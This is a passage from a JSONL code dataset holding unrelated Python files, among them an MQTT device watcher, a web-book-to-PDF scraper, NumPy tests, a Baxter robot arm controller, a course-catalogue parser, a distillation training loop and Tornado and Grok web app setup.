developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'hoc01' : LearningObjective(\n id='hoc01',\n title='I can remember and understand key historic figures from the world of computing.',\n group='History of Computing',\n developing='I can name all of the heroes of computing.',\n satisfactory= 'I can analyse the impact of a hero of computing.',\n exceeding= 'I can create the narrative of the hero of computing.'\n ),\n 'hoc02' : LearningObjective(\n id='hoc02',\n title='I can remember and understand key historic figures from the world of computing.',\n group='History of Computing',\n developing='I can name all of the heroes of computing.',\n satisfactory= 'I can analyse the impact of a hero of computing.',\n exceeding= 'I can create the narrative of the hero of computing.'\n )\n }\n\n def __init__(self):\n self.init_data()\n\n def findById(self, id):\n return self.learning_objectives.get(id)\n\n def findByIds(self, *args):\n result = []\n\n for lo in self.learning_objectives.values():\n \n if lo.id in args:\n result.append(lo)\n \n return result\n \n def groupByType(self, los):\n \"\"\" return the Learning Objectives as a grouped iterable \"\"\"\n \n # sort all lo's by group\n data = sorted(los, key=lambda x: x.group)\n\n #group the LO's by group\n groups = groupby(data, lambda x: x.group)\n\n log_data = []\n\n for group in groups:\n log_data_item = [group, list(group[1])]\n log_data.append(log_data_item)\n\n return log_data\n \n\nloDB = LoDB()\n ","sub_path":"DAO/lo_db.py","file_name":"lo_db.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"510162714","text":"from DeviceController import on_off,get_devices\nimport paho.mqtt.client as mqtt\nimport json,os, time\n\n## CONFIGURATION ##\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\nconfig_file = open(\"config.json\", \"r\")\nconfig_str = config_file.read()\nconfig = json.loads(config_str)\nconfig_file.close()\n###\n\ndef callback_controller(client, userdata, message):\n print(\"%s %s\" % (message.topic, message.payload.decode(\"utf-8\")))\n on_off(message.topic,message.payload.decode(\"utf-8\"))\n\nmqttc = mqtt.Client()\n\n# Add message callbacks that will only trigger on a specific subscription match.\nMQTT_TOPICS=[]\nfor device in get_devices():\n if device != \"motor\":\n mqttc.message_callback_add(device, callback_controller)\n MQTT_TOPICS.append((device,0))\n\n# Connect to MQTT Server and Subscribe to device topics\ncheck = True\nwhile check:\n try:\n mqttc.connect(config[\"mqtt\"][\"server\"], config[\"mqtt\"][\"port\"], config[\"mqtt\"][\"keepalive\"])\n mqttc.subscribe(MQTT_TOPICS)\n mqttc.loop_forever()\n check=False\n except Exception:\n print(\"Unable to connect to MQTT broker, retrying...\")\n time.sleep(1)\n\n","sub_path":"MQTT_watcher.py","file_name":"MQTT_watcher.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19665693","text":"\"\"\"Create pdf from web book. 
Jordan Osborn 2018.\"\"\"\n\nimport requests, bs4, re, pdfkit\nfrom typing import List\nfrom collections import OrderedDict\nfrom multiprocessing import Pool\nfrom sys import argv\nimport os\nfrom shutil import rmtree\n\nTMPOUTPUT = \"haskellWeboutput\"\n\ndef download(url: str) -> str:\n \"\"\"Download url.\n\n Arguments:\n url {str} -- url to download\n\n Returns:\n [type] -- contents from url\n\n \"\"\"\n print(\"Downloading \" + url)\n text = requests.get(url).text\n print(\"Downloaded \" + url)\n return text\n\ndef save(content:tuple) -> None:\n \"\"\"Save file.\n\n Arguments:\n content {tuple} -- (index, file content)\n\n \"\"\"\n print(\"Saving file \" + content[0])\n with open(TMPOUTPUT + \"/\" + content[0]+\".html\", \"w\") as f:\n f.write(content[1])\n print(\"Saved file \" + content[0])\n\nif __name__ == \"__main__\":\n root = argv[1]\n contentPage = argv[2]\n output = argv[3]\n\n baseURIReg = re.compile(r\"(http|https):\\/\\/(.+)\")\n baseURI = baseURIReg.findall(root)[0][1]\n\n reg = re.compile(r\".+?#.*\")\n urls = map(lambda t: t.get(\"href\"), bs4.BeautifulSoup(download(root + \"/\" + contentPage), \"html.parser\").find_all(\"a\"))\n chapters = [contentPage] + list(filter(lambda t: not (t.find(\"http\") == 0 and t.find(baseURI) == -1 or reg.match(t)), urls))\n links: List[str] = list(map(lambda l: (root + \"/\" + l) if l.find(baseURI) == -1 else (l), chapters))\n order = [str(x) for x in range(0,len(links))]\n try:\n rmtree(TMPOUTPUT)\n except FileNotFoundError:\n print(\"Created output directory\")\n os.mkdir(TMPOUTPUT)\n with Pool(10) as p:\n document = p.map(download, links)\n d = list(zip(order, document))\n with Pool(10) as p:\n p.map(save, d)\n print(\"\\n\\nDownloaded all files\\n\\n\")\n\n print(\"Creating \" + output)\n pdfkit.from_file([TMPOUTPUT + \"/\" + x + \".html\" for x in order], output)\n print(\"Created \" + output)\n\n#python3 learnYouAHaskell.py http://learnyouahaskell.com chapters output.pdf","sub_path":"LearnYouAHaskell.py","file_name":"LearnYouAHaskell.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591530930","text":"\nimport numpy as np\nimport unittest\nimport io\nfrom util4test import *\n\nclass TxtIoTest(unittest.TestCase):\n \n def test_loadtxt_simple(self):\n f = io.StringIO(\"0 1\\n2 3\")\n\n a = np.loadtxt(f)\n self.assertEqual(np.float64,a.dtype)\n \n assert_ndarray_almost_equal( self,[[0.0,1.0],\n [2.0,3.0]],a)\n \n def test_loadtxt_dtype(self):\n f = io.StringIO(\"Male 21 72\\nFemale 35 58\")\n a = np.loadtxt(f, dtype={\n 'names': ('gender', 'age', 'weight'),\n 'formats': ('S8', 'i4', 'f4')}) \n assert_ndarray_equal( self, [b\"Male\",b\"Female\"],a[\"gender\"])\n assert_ndarray_equal( self, [21,35],a[\"age\"])\n assert_ndarray_equal( self, [72,58],a[\"weight\"])\n \n def test_loadtxt_sample1(self):\n f = io.StringIO(\"1,0,2\\n3,0,4\")\n a = np.loadtxt(f, delimiter=',', usecols=(0, 2))\n assert_ndarray_almost_equal( self,[[1.0,2.0],[3.0,4.0]],a)","sub_path":"Python/TestNumPy3/test_txt_io.py","file_name":"test_txt_io.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"302528905","text":"#!/usr/bin/env python\n\n# Jon Rovira\n# Summer 2013\n\n################\n# ROS IMPORTS: #\n################\nimport roslib\nimport rospy\nfrom std_msgs.msg import UInt16\n\n####################\n# RETHINK IMPORTS: 
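# The scraper above makes two full Pool passes (download everything, then save
# everything). A sketch of a single streaming pass with Pool.imap, assuming the
# same download()/save() helpers and the order/links lists built in __main__:
from multiprocessing import Pool

def fetch_and_save(item):
    idx, url = item
    save((idx, download(url)))  # save() writes TMPOUTPUT/<idx>.html

if __name__ == "__main__":
    with Pool(10) as p:
        list(p.imap(fetch_and_save, list(zip(order, links))))  # order preserved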
#\n####################\nimport baxter_interface\n\n###############\n# NU IMPORTS: #\n###############\nfrom trajectory import Trajectory\nfrom vector_operations import (make_vector_from_POINTS,\n\t angle_between_vectors,\n\t vector_projection_onto_plane,\n\t shortest_vector_from_point_to_vector)\n\n##################\n# OTHER IMPORTS: #\n##################\nimport operator\nimport math\n\n###################\n# MOVEIT IMPORTS: #\n###################\nimport moveit_commander\nimport moveit_msgs.msg\n\n# from trajectory_speed_up import traj_speed_up\n\nclass Crane():\n \"\"\"\n Crane control class\n\n This class allows Baxter to mimic an inidividual's left arm with Baxter's\n right arm and grants the individual control of Baxter's gripper. The Crane\n obtains tracking data by subscribing to the /skeleton messages published\n by the skeletontracker_nu script.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Crane constructor\n \"\"\"\n self.arm = baxter_interface.Limb('right')\n self.gripper = baxter_interface.Gripper('right')\n # self.pub_rate = rospy.Publisher('/robot/joint_state_publish_rate', UInt16)\n # self.pub_rate.publish(500)\n self.neutral_position = dict(zip(self.arm.joint_names(),\n [0.00, 0.00, 1.57, 0.00, 0.00, 0.00, 0.00]))\n self.crane_l_angles = {'left_s0': 0.35, 'left_s1': 0.00,\n 'left_e0': 0.00, 'left_e1': 1.57,\n 'left_w0': 0.00, 'left_w1': 0.00,\n 'left_w2': 0.00}\n self.gripper_state = True\n self.gripper_state_timer = 0\n self.right_arm = moveit_commander.MoveGroupCommander(\"right_arm\")\n\n def desired_joint_vals(self, left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand):\n \"\"\"\n Returns the joint values based on the human skeleton.\n \"\"\"\n angles = []\n if self.human_to_baxter(left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, angles):\n self.gripper.close()\n else:\n self.gripper.open()\n\n r_positions = dict(zip(self.arm.joint_names(),\n [angles[0], angles[1], angles[2], angles[3],\n angles[4], angles[5], angles[6]]))\n\n return dict(self.crane_l_angles, **r_positions)\n\n def desired_pose_vals(self, left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, torso):\n # Find distance from shoulder to hand for human\n # Total arm length:\n arm_length = (math.sqrt(math.pow((left_shoulder.x - left_elbow.x),2) +\n math.pow((left_shoulder.y - left_elbow.y),2) +\n math.pow((left_shoulder.z - left_elbow.z),2)) +\n math.sqrt(math.pow((left_elbow.x - left_hand.x),2) +\n math.pow((left_elbow.y - left_hand.y),2) +\n math.pow((left_elbow.z - left_hand.z),2)))\n RJ_ARM_LENGTH = 41*2.54/100.0\n #From URDF,\n x_offset = 0.055695\n y_offset = 0\n z_offset = 0.011038\n # Use left values\n x = (left_hand.x - left_shoulder.x - torso.x)*RJ_ARM_LENGTH/arm_length + x_offset\n y = (left_hand.y - left_shoulder.y - torso.y)*RJ_ARM_LENGTH/arm_length + y_offset\n z = (left_hand.z - left_shoulder.z - torso.z)*RJ_ARM_LENGTH/arm_length + z_offset\n\n # Set orientation\n roll = 0 # Could be defined to be in line with the arm or something\n pitch = math.pi/2.0 # Could be defined to be in line with the arm or something\n yaw = 0\n pose = {'x': x, 'y': y, 'z': z, 'roll': roll, 'pitch': pitch, 'yaw': yaw}\n\n # Gripper Control Arm\n r_upper_arm = make_vector_from_POINTS(right_shoulder, right_elbow)\n r_forearm = make_vector_from_POINTS(right_elbow, right_hand)\n # Event\n theta = angle_between_vectors(r_upper_arm, r_forearm)\n if theta > 0.8:\n self.gripper.close()\n else:\n self.gripper.open()\n\n return pose\n \n\n 
def move(self, left_shoulder, left_elbow, left_hand, right_shoulder, right_elbow, right_hand):\n \"\"\"\n Moves the crane arm and gripper based on human skeleton positions\n \"\"\"\n angles = []\n if self.human_to_baxter(left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, angles):\n self.gripper.close()\n else:\n self.gripper.open()\n\n\n r_positions = dict(zip(self.arm.joint_names(),\n [angles[0], angles[1], angles[2], angles[3], angles[4], angles[5], angles[6]]))\n # self.arm.set_joint_positions(r_positions)\n self.right_arm.stop()\n self.right_arm.set_joint_value_target(r_positions)\n traj = self.right_arm.plan()\n new_traj = traj_speed_up(traj, spd=3.0)\n self.right_arm.execute(new_traj)\n\n def human_to_baxter(self, l_sh, l_el, l_ha, r_sh, r_el, r_ha, a):\n \"\"\"\n Computes angles sent to Baxter's arm, checks if gripper should adjust\n \"\"\"\n # Crane Arm\n l_upper_arm = make_vector_from_POINTS(l_sh, l_el)\n l_forearm = make_vector_from_POINTS(l_el, l_ha)\n # S0\n v_xz = vector_projection_onto_plane(l_upper_arm, [0,0,-1], [-1,0,0])\n theta = angle_between_vectors(v_xz, [-1,0,0])\n s0 = theta - math.pi/4\n # S1\n theta = angle_between_vectors(l_upper_arm, v_xz)\n if l_el.y > l_sh.y:\n s1 = theta\n else:\n s1 = -theta\n # E0\n n_upper_arm = shortest_vector_from_point_to_vector(l_ha, l_upper_arm,\n l_forearm, l_sh)\n theta = angle_between_vectors(n_upper_arm, [0,1,0])\n e0 = theta\n # E1\n theta = angle_between_vectors(l_upper_arm, l_forearm)\n e1 = theta\n # W0, W1, and W2\n w0 = -1.57\n w1 = 0.00\n w2 = -0.30\n # Check if angles are valid\n self.check_angles(s0,s1,e0,e1,w0,w1,w2,a)\n\n # Gripper Control Arm\n r_upper_arm = make_vector_from_POINTS(r_sh, r_el)\n r_forearm = make_vector_from_POINTS(r_el, r_ha)\n # Event\n theta = angle_between_vectors(r_upper_arm, r_forearm)\n if theta > 0.8:\n return True\n return False\n\n def check_angles(self, s0, s1, e0, e1, w0, w1, w2, angles):\n\n if -0.25 < s0 and s0 < 1.60:\n angles.append(s0)\n elif -0.25 < s0:\n angles.append(1.60)\n else:\n angles.append(-0.25)\n\n # s1 assignment in safe range\n if -2.00 < s1 and s1 < 0.90:\n angles.append(s1)\n elif -2.00 < s1:\n angles.append(0.90)\n else:\n angles.append(-2.00)\n\n # e0 assignment\n angles.append(e0)\n\n # e1 assignment in safe range\n if 0.10 < e1 and e1 < 2.50:\n angles.append(e1)\n elif 0.10 < e1:\n angles.append(2.50)\n else:\n angles.append(0.10)\n\n # w0, w1, and w2 assignment\n angles.extend([w0,w1,w2])\n","sub_path":"src/crane.py","file_name":"crane.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"55887712","text":"'''\r\ncisclass.py\r\n'''\r\nimport re\r\n\r\nclass CISclasses:\r\n def __init__(self):\r\n ''' constructor '''\r\n FILE_NAME = \"lab8_no_blankline.txt\"\r\n seasonCount = 0\r\n self.season = list()\r\n self.schedule = list()\r\n self.courseNum = list()\r\n self.className = list()\r\n self.dataBase = dict() # 1st dictionary\r\n self.dataBase2 = dict() # 2nd dictionary\r\n try:\r\n with open(FILE_NAME) as inFile:\r\n for line in inFile:\r\n m1 = re.findall(\">[A-Z]{3} \\d+[A-Z]*<\", line) # course title\r\n m2 = re.findall('([\"][>]([(]|[A-Za-z]).+([a-zA-Z]|[)]|[+])[<])', line) # course's introduction\r\n if len(m1) != 0:\r\n val = m1[0]\r\n val = re.sub(\"\\>\",'', val)\r\n val = re.sub(\"\\<\",'', val)\r\n self.courseNum.append(val)\r\n if len(m2) != 0:\r\n val = m2[0]\r\n if \"\" not in str(val):\r\n val = val[0] # get string value from 
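# The crane code above calls helpers imported from vector_operations that are
# not shown in this file. Plausible NumPy sketches of two of them, inferred
# from the call sites (guesses, not the module's actual source):
import numpy as np

def make_vector_from_POINTS(p1, p2):
    # vector from point p1 to point p2; skeleton points expose .x/.y/.z
    return np.array([p2.x - p1.x, p2.y - p1.y, p2.z - p1.z])

def angle_between_vectors(v1, v2):
    # arccos of the normalized dot product, clipped for numerical safety
    cos_theta = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
    return float(np.arccos(np.clip(cos_theta, -1.0, 1.0)))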
tuple\r\n val = re.sub(\">\", \"\" , val)\r\n val = re.sub(\"<\", \"\" , val)\r\n val = re.sub('\"', \"\" , val)\r\n self.className.append(val)\r\n if \"#ffffff\" in line: #the line of schedule: fall/winter/spring/summer\r\n if \">x<\" in line:\r\n self.season.append(True) # assign True\r\n else:\r\n self.season.append(False) # assign False\r\n if len(self.season) == 4:\r\n seasonCount = 0\r\n t = (self.season[0],self.season[1], self.season[2], self.season[3]) # store into a tuple\r\n self.schedule.append(t) # append the tuple in the list\r\n self.season = list() # initialize the attribute for next course\r\n seasonCount += 1\r\n self.dataBase = self._createDict(self.courseNum, self.className, self.schedule)\r\n self.dataBase2 = self._createDict(self.className, self.courseNum, self.schedule)\r\n except FileNotFoundError as e:\r\n print(\"can't open\", FILE_NAME)\r\n raise SystemExit\r\n \r\n def _createDict(self, key, val1, val2):\r\n ''' create the dictionary '''\r\n d = dict()\r\n for i in range(len(key)):\r\n L = list([val1[i], val2[i]])\r\n d[key[i]] = d.get(0,L)\r\n return d\r\n \r\n def option1(self, userInput):\r\n ''' to search the class by number '''\r\n val = self.dataBase[userInput]\r\n intro = val[0] # calss name\r\n schedule = val[1] # schedule\r\n formatedSche = self._printSchedule(schedule)\r\n return (userInput, intro + \": \" + formatedSche) # returns tuple\r\n \r\n def _printSchedule(self,schedule):\r\n ''' to private method option1 to format the quarter message '''\r\n retVal = \"\"\r\n fall = schedule[0]\r\n winter = schedule[1]\r\n spring = schedule[2]\r\n summer = schedule[3]\r\n if fall == True:\r\n retVal += \"Fall,\"\r\n if winter == True:\r\n retVal += \"Winter,\"\r\n if spring == True:\r\n retVal += \"Spring,\"\r\n if summer == True:\r\n retVal += \"Summer\"\r\n if retVal[-1] == \",\": # if the final char is ','\r\n retVal = self._removeChar(retVal, len(retVal)-1)\r\n return retVal\r\n \r\n def _removeChar(self, str, index):\r\n ''' a method to remove a char in specific index'''\r\n firstPart = str[0:index]\r\n lastPart = str[index+1:len(str)-1]\r\n return firstPart + lastPart\r\n \r\n def option2(self, userInput):\r\n ''' to search the classes by topic '''\r\n d2 = self.dataBase2\r\n resultList = list()\r\n resultMsg = \"\"\r\n regex = \"\"\r\n firstChar = userInput[0]\r\n lastChar = \"\"\r\n if len(userInput) > 1:\r\n lastChar = userInput[-1]\r\n \r\n if userInput == \"C++\": # special case for \"C++\"\r\n regex = \"\\\\bC\\+\\+\"\r\n elif userInput == \"C#\": # special case for C#\r\n regex = \"\\\\bC#\"\r\n elif userInput == \"C\": # special case for C\r\n regex = \"((^|\\s)(C)(\\s)+)\"\r\n else:\r\n regex = \"\\\\b\" + userInput + \"\\\\b\" \r\n for elem in self.dataBase:\r\n classList = self.dataBase[elem] # access the value of dict (which is a list)\r\n className = classList[0] # get class name\r\n if userInput in className.title(): # if the keyword of topic is found (but not entirely)\r\n target = re.search(regex, className, re.I) # search for exact word. 
No more or less\r\n if target != None:\r\n targetVal = (target.group().rstrip()).lstrip() # remove all the white spaces before and after the string\r\n if targetVal.title() == userInput:\r\n resultList.append(className)\r\n resultList.sort() # sort the list of class name\r\n \r\n # formating the return message\r\n for key in resultList:\r\n elem = d2[key] # use dictionary's key(class Name) to get the list\r\n name = elem[0] # get the class name\r\n result = name + \": \" + key + \"\\n\"\r\n resultMsg += result\r\n return resultMsg\r\n \r\n def option3(self, inputTopic, inputQuarter):\r\n ''' to search the classes by topic and quarter '''\r\n d2 = self.dataBase2 \r\n resultList = list()\r\n resultMsg = \"\"\r\n index = 0\r\n if inputQuarter == \"Fall\":\r\n index = 0\r\n elif inputQuarter == \"Winter\":\r\n index = 1\r\n elif inputQuarter == \"Spring\":\r\n index = 2\r\n elif inputQuarter == \"Summer\":\r\n index = 3\r\n for elem in self.dataBase:\r\n classList = self.dataBase[elem] \r\n className = classList[0] # get class name\r\n schedule = classList[1] # get 4 quarter for each class\r\n if inputTopic in className: # if the topic is found\r\n if schedule[index] == True: # if this quarter is available\r\n resultList.append(className) \r\n resultList.sort()\r\n \r\n # formating the return message\r\n for key in resultList:\r\n elem = d2[key] # use dictionary's key(class Name) to get the list\r\n name = elem[0] # get the class name\r\n result = name + \": \" + key + \"\\n\"\r\n resultMsg += result\r\n return resultMsg ","sub_path":"CIS 41A/HW#8/cisclasses.py","file_name":"cisclasses.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543826345","text":"import torch.optim as optim\nimport torch.nn as nn\nimport torch\nimport os\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef distilltrain(teacher, student, train_iter, dev_iter, args):\n print(\"开始蒸馏!\")\n teacher.eval()\n student.train()\n\n optimizer = optim.Adam(student.parameters(), lr = args.lr)\n\n best_acc = 0\n steps = 0\n last_step = 0\n teacher = teacher.to(device)\n student = student.to(device)\n \n print('training...')\n for epoch in range(args.epochs):\n student.train()\n for batch in train_iter: \n feature, target, mask = batch[1], batch[0], batch[2]\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n with torch.no_grad():\n t_logits = teacher(feature, mask, None)\n # 清除梯度\n optimizer.zero_grad()\n output = student(feature)\n losscalc = nn.KLDivLoss()\n loss = 0.5*losscalc(F.log_softmax(output/2.0, dim=-1), F.softmax(t_logits/2.0, dim=-1)*2.0**2) + 0.5*F.cross_entropy(F.sigmoid(output), target)\n loss.backward()\n optimizer.step()\n \n steps += 1\n if steps % 10 == 0:\n result = torch.max(output,1)[1].view(target.size())\n corrects = (result.data == target.data).sum()\n accuracy = corrects*100.0/len(batch[0])\n print('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}'.format(\n steps, loss.data.item(), accuracy))\n elif steps % 200 == 0:\n save(student, args.save_dir,'snapshot',steps)\n dev_acc = eval(dev_iter, student, args)\n if dev_acc > best_acc:\n best_acc = dev_acc\n last_step = steps\n if args.save_best:\n save(student, args.save_dir,'best',steps)\n\n\n\n\n\ndef save(model, save_dir, save_prefix, steps):\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n save_prefix = os.path.join(save_dir,save_prefix)\n save_path = 
'{}_steps_{}.pt'.format(save_prefix,steps)\n torch.save(model.state_dict(),save_path)\n\ndef eval(data_iter, model, args):\n model.eval()\n corrects, avg_loss = 0,0\n for batch in data_iter:\n feature, target = batch[1], batch[0]\n feature = feature.to(device)\n target = target.to(device)\n \n logit = model(feature)\n loss = F.cross_entropy(logit,target)\n \n avg_loss += loss.data\n result = torch.max(logit,1)[1]\n corrects += (result.view(target.size()).data == target.data).sum()\n \n size = len(data_iter.dataset)\n avg_loss /= size \n accuracy = 100.0 * corrects/size\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f}%({}/{}) \\n'.format(avg_loss,accuracy,corrects,size))\n \n return accuracy\n","sub_path":"distill_test/distiller.py","file_name":"distiller.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259434684","text":"\n\nfrom xai.brain.wordbase.nouns._tattoo import _TATTOO\n\n#calss header\nclass _TATTOOED(_TATTOO, ):\n\tdef __init__(self,): \n\t\t_TATTOO.__init__(self)\n\t\tself.name = \"TATTOOED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tattoo\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tattooed.py","file_name":"_tattooed.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"381632815","text":"# -*- coding: utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.options\nimport secret\nimport os\n\nfrom handlers.main import MainHandler\nfrom handlers.nl import NaturalLanguageSearch\nimport handlers.api as api\nimport handlers.auth as auth\nimport admin.main as admin\nimport admin.users as admin_users\nimport ws, db\n\nis_closing = False\n\ndef signal_handler(signum, frame):\n global is_closing\n is_closing = True\n\ndef try_exit():\n global is_closing\n if is_closing:\n # clean up here\n tornado.ioloop.IOLoop.instance().stop()\n\nclass NoCacheStaticHandler(tornado.web.StaticFileHandler):\n \"\"\" Request static file handlers for development and debug only.\n It disables any caching for static file.\n \"\"\"\n def set_extra_headers(self, path):\n self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')\n\ndef main():\n \n tornado.options.define(\"static_path\", default = \"../client/static\", help = \"path to static files directory\", type = str)\n tornado.options.define(\"templates_path\", default = \"../client/templates\", help = \"path to template files directory\", type = str)\n tornado.options.define(\"sctp_port\", default = 55770, help = \"port of sctp server\", type = int)\n tornado.options.define(\"sctp_host\", default = \"localhost\", help = \"host of sctp server\", type = str)\n tornado.options.define(\"event_wait_timeout\", default = 10, help = \"time to wait commands processing\", type = int)\n tornado.options.define(\"idtf_serach_limit\", default = 20, help = \"number of maximum results for searching by identifier\", type = int)\n tornado.options.define(\"redis_host\", default = \"localhost\", help = \"host of redis server\", type = str)\n tornado.options.define(\"redis_port\", default = 6379, help = \"port of redis server\", type = int)\n tornado.options.define(\"redis_db_idtf\", default = 0, help = \"number of redis database to store identifiers\", type = int)\n tornado.options.define(\"redis_db_user\", default = 1, help = \"number of redis database to store user info\", type = int)\n 
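# The loss in distilltrain() above is the usual two-term knowledge-distillation
# mix: a temperature-softened KL term against the teacher plus a hard-label
# term. A standalone Hinton-style sketch with T and alpha as knobs; note that
# F.cross_entropy already expects raw logits, so no sigmoid is applied first:
import torch.nn.functional as F

def kd_loss(student_logits, teacher_logits, targets, T=2.0, alpha=0.5):
    soft = F.kl_div(F.log_softmax(student_logits / T, dim=-1),
                    F.softmax(teacher_logits / T, dim=-1),
                    reduction="batchmean") * (T * T)  # T^2 rescales gradients
    hard = F.cross_entropy(student_logits, targets)
    return alpha * soft + (1.0 - alpha) * hard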
tornado.options.define(\"host\", default = \"localhost\", help = \"host name\", type = str)\n tornado.options.define(\"port\", default = 8000, help = \"host port\", type = int)\n \n tornado.options.define(\"google_client_id\", default = \"\", help = \"client id for google auth\", type = str)\n tornado.options.define(\"google_client_secret\", default = \"\", help = \"client secret for google auth\", type = str)\n \n tornado.options.define(\"apiai_subscription_key\", default = \"\", help = \"subscription key for api.ai\", type = str)\n tornado.options.define(\"apiai_client_access_token\", default = \"\", help = \"client access token for api.ai\", type = str)\n \n tornado.options.define(\"user_key_expire_time\", default = 600, help = \"user key expire time in seconds\", type = int)\n tornado.options.define(\"super_emails\", default = \"\", help = \"email of site super administrator (maximum rights)\", type = list)\n tornado.options.define(\"db_path\", default = \"data.db\", help = \"path to database file\", type = str)\n \n tornado.options.define(\"cfg\", default = \"server.conf\", help = \"path to configuration file\", type = str)\n\n tornado.options.parse_command_line()\n if os.path.exists(tornado.options.options.cfg):\n tornado.options.parse_config_file(tornado.options.options.cfg)\n\n # prepare database\n database = db.DataBase()\n database.init()\n\n rules = [\n (r\"/\", MainHandler),\n\n (r\"/static/(.*)\", NoCacheStaticHandler, {\"path\": tornado.options.options.static_path}),\n\n # api\n (r\"/api/init/\", api.Init),\n (r\"/api/context/\", api.ContextMenu),\n (r\"/api/cmd/do/\", api.CmdDo),\n (r\"/api/cmd/text/\", NaturalLanguageSearch),\n \n (r\"/api/question/answer/translate/\", api.QuestionAnswerTranslate),\n \n (r\"/api/link/content/\", api.LinkContent),\n (r\"/api/link/format/\", api.LinkFormat),\n \n (r\"/api/languages/\", api.Languages),\n (r\"/api/languages/set/\", api.LanguageSet),\n \n (r\"/api/idtf/find/\", api.IdtfFind),\n (r\"/api/idtf/resolve/\", api.IdtfResolve),\n \n (r\"/api/addr/resolve/\", api.AddrResolve),\n \n (r\"/api/info/tooltip/\", api.InfoTooltip),\n \n (r\"/api/user/\", api.User),\n \n (r\"/auth/google$\", auth.GoogleOAuth2LoginHandler),\n (r\"/auth/logout$\", auth.LogOut),\n \n (r\"/admin$\", admin.MainHandler),\n (r\"/admin/users/get$\", admin_users.UsersInfo),\n (r\"/admin/users/set_rights$\", admin_users.UserSetRights),\n (r\"/admin/users/list_rights$\", admin_users.UserListRights),\n\n (r\"/sctp\", ws.SocketHandler),\n ]\n\n application = tornado.web.Application(\n handlers = rules, \n cookie_secret = secret.get_secret(),\n login_url = \"/auth/google\",\n template_path = tornado.options.options.templates_path,\n xsrf_cookies = False,\n gzip = True,\n \n google_oauth = {\"key\": tornado.options.options.google_client_id, \n \"secret\": tornado.options.options.google_client_secret\n }\n )\n\n application.listen(tornado.options.options.port)\n tornado.ioloop.PeriodicCallback(try_exit, 1000).start()\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128104195","text":"import zope.component\nimport zope.interface\nimport zope.schema\nimport zope.event\nimport zope.lifecycleevent\nfrom zope.schema.fieldproperty import FieldProperty\nfrom zope.traversing.browser import absoluteURL\nfrom zope.app.intid import IntIds\nfrom 
zope.app.intid.interfaces import IIntIds\nfrom zope.app.catalog.catalog import Catalog\nfrom zope.app.catalog.interfaces import ICatalog\nfrom zope.app.security.interfaces import (ILogout,\n IAuthentication,\n IUnauthenticatedGroup,\n IUnauthenticatedPrincipal)\nfrom zope.securitypolicy.interfaces import (IRolePermissionManager,\n IPrincipalPermissionManager)\nfrom zope.app.session.interfaces import (IClientIdManager,\n ISessionDataContainer)\nfrom zope.app.session.http import CookieClientIdManager\nfrom zope.app.session.interfaces import ISessionDataContainer\nfrom zope.app.session.session import PersistentSessionDataContainer\n\nfrom z3c.authentication.cookie.interfaces import SESSION_KEY\nfrom z3c.authentication.cookie.session import \\\n CookieCredentialSessionDataContainer\n\nfrom z3c.form import form, field, button, group\nfrom z3c.form.browser.checkbox import CheckBoxFieldWidget\nfrom z3c.form.interfaces import IWidgets\nfrom z3c.formui import layout\nfrom z3c.formjs import jsaction, jsevent, jsvalidator, ajax\nfrom z3c.configurator import configurator\nfrom z3c.authentication.simple.authentication import SimpleAuthentication\n\nimport grok\n\nimport mars.layer\nimport mars.template\nimport mars.view\nimport mars.form\n\nfrom tfws.website import interfaces\nfrom tfws.website import authentication\nfrom tfws.website import permissions\nfrom tfws.website import roles\nfrom tfws.website import members\nfrom tfws.website.catalog import setup_catalog\nfrom tfws.website.layer import IWebSiteLayer\nfrom tfws.website.i18n import MessageFactory as _\n\nmars.layer.layer(IWebSiteLayer)\n\ngrok.global_utility(PersistentSessionDataContainer,\n ISessionDataContainer,\n name='')\n\nclass WebSite(grok.Application, grok.Container):\n \"\"\"Mars/Grok/Z3C demo website\n\n \"\"\"\n zope.interface.implements(interfaces.IWebSite)\n grok.local_utility(IntIds, IIntIds) # needed for the catalog\n grok.local_utility(Catalog, ICatalog, setup=setup_catalog,\n name_in_container='wcatalog')\n grok.local_utility(SimpleAuthentication, 